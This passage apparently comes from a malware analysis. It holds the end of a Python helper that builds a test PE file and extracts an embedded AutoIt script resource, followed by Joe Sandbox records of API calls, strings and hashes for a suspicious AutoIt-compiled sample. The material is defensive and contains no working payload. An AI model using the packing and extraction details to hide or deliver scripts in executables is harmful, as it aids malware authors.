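    r += payload

    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                          # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 1, 0, 0, 0, 0, 0x102)  # COFF header, no optional header
    struct.pack_into("<8sIIIIIIHHI", hdr, 0x58, b".rsrc", len(r), rsrc_rva,
                     len(r), 0x200, 0, 0, 0, 0, 0x40000040)          # single section header
    return bytes(hdr) + bytes(r)


if __name__ == "__main__":
    # Constructed payload; the AU3!EA06 prefix is an assumed AutoIt marker, not taken from this report.
    sample = build_sample_pe(b"AU3!EA06" + b"\x00" * 16 + b"constructed-script-body")
    blob = extract_script_resource(sample)
    print(len(blob), blob[:8])
```

To use it on the real sample, read the file and call extract_script_resource() on its bytes. A None result means the script is not in the resource section; AutoIt extraction tools then fall back to scanning the whole file for the AU3! marker, since it is also found outside the resource directory in some builds.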
                              APIs
                              • GetFileAttributesW.KERNELBASE(?,008BE7C1), ref: 008E46A6
                              • FindFirstFileW.KERNELBASE(?,?), ref: 008E46B7
                              • FindClose.KERNEL32(00000000), ref: 008E46C7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FileFind$AttributesCloseFirst
                              • String ID:
                              • API String ID: 48322524-0
                              • Opcode ID: 7f0693936b45c5a014bf4f305c02a90846bcc8e31da802d1481b0bc1fc4bc8e7
                              • Instruction ID: 3f9aba85dfc89bcb4a157bd7f9b710667798209024e7ab9bb8507ed63a989566
                              • Opcode Fuzzy Hash: 7f0693936b45c5a014bf4f305c02a90846bcc8e31da802d1481b0bc1fc4bc8e7
                              • Instruction Fuzzy Hash: CDE0D8324284006F9220B738EC5D4EA775CEE17375F100715F939C14F0E7B06A509595
                              Strings
                              • Variable must be of type 'Object'., xrefs: 008C428C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: Variable must be of type 'Object'.
                              • API String ID: 0-109567571
                              • Opcode ID: 746fc7b2ac0e8e047967ec11ca56f4228e0dfc29219258908528819b440756f5
                              • Instruction ID: 086cbaaaded56ce4e3d581d240ba040e98a35dcaa68a4519966f10e06ae3db18
                              • Opcode Fuzzy Hash: 746fc7b2ac0e8e047967ec11ca56f4228e0dfc29219258908528819b440756f5
                              • Instruction Fuzzy Hash: A4A2B474A04219CFCB24EF98C480AADB7B1FF59314F248469E916EB352D771ED82CB91
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00890BBB
                              • timeGetTime.WINMM ref: 00890E76
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00890FB3
                              • TranslateMessage.USER32(?), ref: 00890FC7
                              • DispatchMessageW.USER32(?), ref: 00890FD5
                              • Sleep.KERNEL32(0000000A), ref: 00890FDF
                              • LockWindowUpdate.USER32(00000000,?,?), ref: 0089105A
                              • DestroyWindow.USER32 ref: 00891066
                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00891080
                              • Sleep.KERNEL32(0000000A,?,?), ref: 008C52AD
                              • TranslateMessage.USER32(?), ref: 008C608A
                              • DispatchMessageW.USER32(?), ref: 008C6098
                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008C60AC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                              • API String ID: 4003667617-3242690629
                              • Opcode ID: 1455b4919bebdc807a41d057bc19886afcb07df75ead32dcb3adec37614f466d
                              • Instruction ID: 6f47c092f7adc2afc7b5f4e30988f45ea88e566af365fe7948ff1d35d17878d5
                              • Opcode Fuzzy Hash: 1455b4919bebdc807a41d057bc19886afcb07df75ead32dcb3adec37614f466d
                              • Instruction Fuzzy Hash: 4BB28F70608741DFDB28EB24C894F6AB7E5FF85304F18491DE49AD72A1DB71E984CB82


                              APIs
                                • Part of subcall function 008E91E9: __time64.LIBCMT ref: 008E91F3
                                • Part of subcall function 00885045: _fseek.LIBCMT ref: 0088505D
                              • __wsplitpath.LIBCMT ref: 008E94BE
                                • Part of subcall function 008A432E: __wsplitpath_helper.LIBCMT ref: 008A436E
                              • _wcscpy.LIBCMT ref: 008E94D1
                              • _wcscat.LIBCMT ref: 008E94E4
                              • __wsplitpath.LIBCMT ref: 008E9509
                              • _wcscat.LIBCMT ref: 008E951F
                              • _wcscat.LIBCMT ref: 008E9532
                                • Part of subcall function 008E922F: _memmove.LIBCMT ref: 008E9268
                                • Part of subcall function 008E922F: _memmove.LIBCMT ref: 008E9277
                              • _wcscmp.LIBCMT ref: 008E9479
                                • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AAE
                                • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AC1
                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008E96DC
                              • _wcsncpy.LIBCMT ref: 008E974F
                              • DeleteFileW.KERNEL32(?,?), ref: 008E9785
                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008E979B
                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008E97AC
                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008E97BE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                              • String ID:
                              • API String ID: 1500180987-0
                              • Opcode ID: 9799290b4dc179175d3e23bdaa5eb60455453eaafa53454cf3b3e2dfc916a0b6
                              • Instruction ID: f2d68174cc297901038ee72f245728a65e4dd410d671cdc1c8e41907d2a0f541
                              • Opcode Fuzzy Hash: 9799290b4dc179175d3e23bdaa5eb60455453eaafa53454cf3b3e2dfc916a0b6
                              • Instruction Fuzzy Hash: 9CC11CB1D00219AEDF21DF99CC85ADEB7BDFF55310F0040AAF609E6251EB709A848F65


                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 00883074
                              • RegisterClassExW.USER32(00000030), ref: 0088309E
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008830AF
                              • InitCommonControlsEx.COMCTL32(?), ref: 008830CC
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008830DC
                              • LoadIconW.USER32(000000A9), ref: 008830F2
                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00883101
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                              • API String ID: 2914291525-1005189915
                              • Opcode ID: 1f98e9e92a54215c0c05fcf1a836caa9a425086a3bdc922ac0fa8b5daf656ce0
                              • Instruction ID: 32c6afa0f4624543f6cca9aeb3244529d7dd34ad4364af434543392857c2c867
                              • Opcode Fuzzy Hash: 1f98e9e92a54215c0c05fcf1a836caa9a425086a3bdc922ac0fa8b5daf656ce0
                              • Instruction Fuzzy Hash: D3318CB5829309EFDB10CFA4DC88AC9BFF4FB0A310F10416AE550E62A0D3B50645DF52


                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 00883074
                              • RegisterClassExW.USER32(00000030), ref: 0088309E
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008830AF
                              • InitCommonControlsEx.COMCTL32(?), ref: 008830CC
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008830DC
                              • LoadIconW.USER32(000000A9), ref: 008830F2
                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00883101
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                              • API String ID: 2914291525-1005189915
                              • Opcode ID: 7900522be52abbe50b4d366173a4eb7461e8a220f19a72e67d8057f6d5b64df0
                              • Instruction ID: 1bf6c01e04f4d9c48b7130295c086bca98e4126d89ae04665af2e3afb1ed064a
                              • Opcode Fuzzy Hash: 7900522be52abbe50b4d366173a4eb7461e8a220f19a72e67d8057f6d5b64df0
                              • Instruction Fuzzy Hash: 7B21C7B5925318AFDB10DFA4EC59B9DBBF4FB0A704F00412AF510E62A0D7B14644AF92

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00884864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009462F8,?,008837C0,?), ref: 00884882
                                • Part of subcall function 008A074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008872C5), ref: 008A0771
                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00887308
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008BECF1
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008BED32
                              • RegCloseKey.ADVAPI32(?), ref: 008BED70
                              • _wcscat.LIBCMT ref: 008BEDC9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                              • API String ID: 2673923337-2727554177
                              • Opcode ID: 145b2c3008e1470c8cf1c2a55a1cd56faf1091db99ac4851edb2a712adbdc180
                              • Instruction ID: 414b6e48fd46bd72b4022598eab469549fabc9a0f876fe3cc599f0dfafe7cbd3
                              • Opcode Fuzzy Hash: 145b2c3008e1470c8cf1c2a55a1cd56faf1091db99ac4851edb2a712adbdc180
                              • Instruction Fuzzy Hash: C0715B7511C3059EC324EFA9D881CABB7F8FB86740B44492EF455C32A0EBB09948DB92

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 00883A62
                              • LoadCursorW.USER32(00000000,00007F00), ref: 00883A71
                              • LoadIconW.USER32(00000063), ref: 00883A88
                              • LoadIconW.USER32(000000A4), ref: 00883A9A
                              • LoadIconW.USER32(000000A2), ref: 00883AAC
                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00883AD2
                              • RegisterClassExW.USER32(?), ref: 00883B28
                                • Part of subcall function 00883041: GetSysColorBrush.USER32(0000000F), ref: 00883074
                                • Part of subcall function 00883041: RegisterClassExW.USER32(00000030), ref: 0088309E
                                • Part of subcall function 00883041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008830AF
                                • Part of subcall function 00883041: InitCommonControlsEx.COMCTL32(?), ref: 008830CC
                                • Part of subcall function 00883041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008830DC
                                • Part of subcall function 00883041: LoadIconW.USER32(000000A9), ref: 008830F2
                                • Part of subcall function 00883041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00883101
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                              • String ID: #$0$AutoIt v3
                              • API String ID: 423443420-4155596026
                              • Opcode ID: d4f2ba05abdf407f7bf1b82214f79dd41bbfdbf56ffd7f1fcb6f916e845faf84
                              • Instruction ID: df40e0142a417fc6fee6ed11a5b9b5914d0f3ee105b7b160fbfee4f257a3f3b2
                              • Opcode Fuzzy Hash: d4f2ba05abdf407f7bf1b82214f79dd41bbfdbf56ffd7f1fcb6f916e845faf84
                              • Instruction Fuzzy Hash: FF214DB5929308BFEB10DFA4EC19F9D7BB4FB0A711F000129E514E62A0D3B55654AF46

                              Control-flow Graph

                              • [control_flow_graph 767: entry block 883633-883681; legend: Executed / Not Executed]
                              APIs
                              • DefWindowProcW.USER32(?,?,?,?), ref: 008836D2
                              • KillTimer.USER32(?,00000001), ref: 008836FC
                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0088371F
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0088372A
                              • CreatePopupMenu.USER32 ref: 0088373E
                              • PostQuitMessage.USER32(00000000), ref: 0088375F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                              • String ID: TaskbarCreated
                              • API String ID: 129472671-2362178303
                              • Opcode ID: a8f423069ecde170e4196f125cf97a1418e367acbfac37e81021e6ac7d96e408
                              • Instruction ID: 0c062564df891e824807cee73e0d8f50918cce7d87a9ae7672ca2534f889320a
                              • Opcode Fuzzy Hash: a8f423069ecde170e4196f125cf97a1418e367acbfac37e81021e6ac7d96e408
                              • Instruction Fuzzy Hash: 3C41D4F2218209BBDF24BB6CDC09F793795F716700F140539F602C63A2EAA19A04A763

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                              • API String ID: 1825951767-3513169116
                              • Opcode ID: 9571e50688a45498e4ca7667b6f4d3f74549d06b89693c1229e78449a6665441
                              • Instruction ID: 612914fbd74f6a5e537aa7e687dd5b857ea40c9cbd290cb70931d0a9526e5bc7
                              • Opcode Fuzzy Hash: 9571e50688a45498e4ca7667b6f4d3f74549d06b89693c1229e78449a6665441
                              • Instruction Fuzzy Hash: 5BA14F75910229AACB14FBA8CC95DEEB778FF15700F540429F412F7191EF749A05CB62

                              Control-flow Graph

                              • [control_flow_graph 942: entry block 1102630-11026de; legend: Executed / Not Executed]
                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01102701
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01102927
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                              • Instruction ID: 52bb2f4b3558577fc4c7d824856e79c6779ac16ce4106fd21ac2a8b03c954110
                              • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                              • Instruction Fuzzy Hash: BCA11674E00219EBDB19CFA4C898BEEBBB5BF48304F208159E615BB2C0D7B59A41CB55

                              Control-flow Graph

                              • [control_flow_graph 1073: single block 8839e7-883a57, calls CreateWindowExW * 2, ShowWindow * 2; legend: Executed / Not Executed]
                              APIs
                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00883A15
                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00883A36
                              • ShowWindow.USER32(00000000,?,?), ref: 00883A4A
                              • ShowWindow.USER32(00000000,?,?), ref: 00883A53
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$CreateShow
                              • String ID: AutoIt v3$edit
                              • API String ID: 1584632944-3779509399
                              • Opcode ID: 9db71cfde89f3d44930474eb2db5bc0540e67006e9609b7098df524f905c264d
                              • Instruction ID: b002539d82f0211c691fb1fa65c1fff7590ad12d698d34ae1fef628522557432
                              • Opcode Fuzzy Hash: 9db71cfde89f3d44930474eb2db5bc0540e67006e9609b7098df524f905c264d
                              • Instruction Fuzzy Hash: 16F03AB4665290BEEB3117276C18E273E7DE7C7F50B00012AB910E21B0C2E50800EAB2

                              Control-flow Graph

                              • [control_flow_graph 1074: entry block 11023b0-1102529; legend: Executed / Not Executed]
                              APIs
                                • Part of subcall function 011022A0: Sleep.KERNELBASE(000001F4), ref: 011022B1
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0110251C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateFileSleep
                              • String ID: 43GVE1URGKC4EJDGTK5UM1F2TMU4
                              • API String ID: 2694422964-467979337
                              • Opcode ID: 273b8836ccad534bc7504cc77f8600c97d60c8046a469dda9c14ebdf15a2795d
                              • Instruction ID: b953508cf78c81c65f3b1a4b5441650371cfe5d3129f76e25c515067a141940a
                              • Opcode Fuzzy Hash: 273b8836ccad534bc7504cc77f8600c97d60c8046a469dda9c14ebdf15a2795d
                              • Instruction Fuzzy Hash: E5618530D04288DBEF16DBE4C8587DEBB75AF19304F044199D2497B2C1D7BA1B45CB6A

                              Control-flow Graph

                              • [control_flow_graph 1098: entry block 8a564d-8a5666; legend: Executed / Not Executed]
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                              • String ID:
                              • API String ID: 1559183368-0
                              • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                              • Instruction ID: a8c9d7cdc34dd1b7a68cd2ff06492c9ff89dc08201488cd9622f0f6b5d4b08d5
                              • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                              • Instruction Fuzzy Hash: 8751B571A00B09DBEB248FB9C88466E77A1FF52324F648729F825E6AD0D7709D908B51

                              Control-flow Graph

                              • [control_flow_graph 1163: entry block 8869ca-8869f1; legend: Executed / Not Executed]
                              APIs
                                • Part of subcall function 00884F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884F6F
                              • _free.LIBCMT ref: 008BE68C
                              • _free.LIBCMT ref: 008BE6D3
                                • Part of subcall function 00886BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00886D0D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _free$CurrentDirectoryLibraryLoad
                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                              • API String ID: 2861923089-1757145024
                              • Opcode ID: 881d9a43d2390cf15da7b2553836c40a426ccf8616e5009486c6cdd83781220e
                              • Instruction ID: eaf4352113fdb991e1f9b3970f1e6837b365ab8ff63fc96d10e7704b9acea53b
                              • Opcode Fuzzy Hash: 881d9a43d2390cf15da7b2553836c40a426ccf8616e5009486c6cdd83781220e
                              • Instruction Fuzzy Hash: FD916B71910619AFCF14EFA8CC919EDB7B4FF19314F14446AF816EB2A1EB30A904CB61
                              APIs
                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008835A1,SwapMouseButtons,00000004,?), ref: 008835D4
                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008835A1,SwapMouseButtons,00000004,?,?,?,?,00882754), ref: 008835F5
                              • RegCloseKey.KERNELBASE(00000000,?,?,008835A1,SwapMouseButtons,00000004,?,?,?,?,00882754), ref: 00883617
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
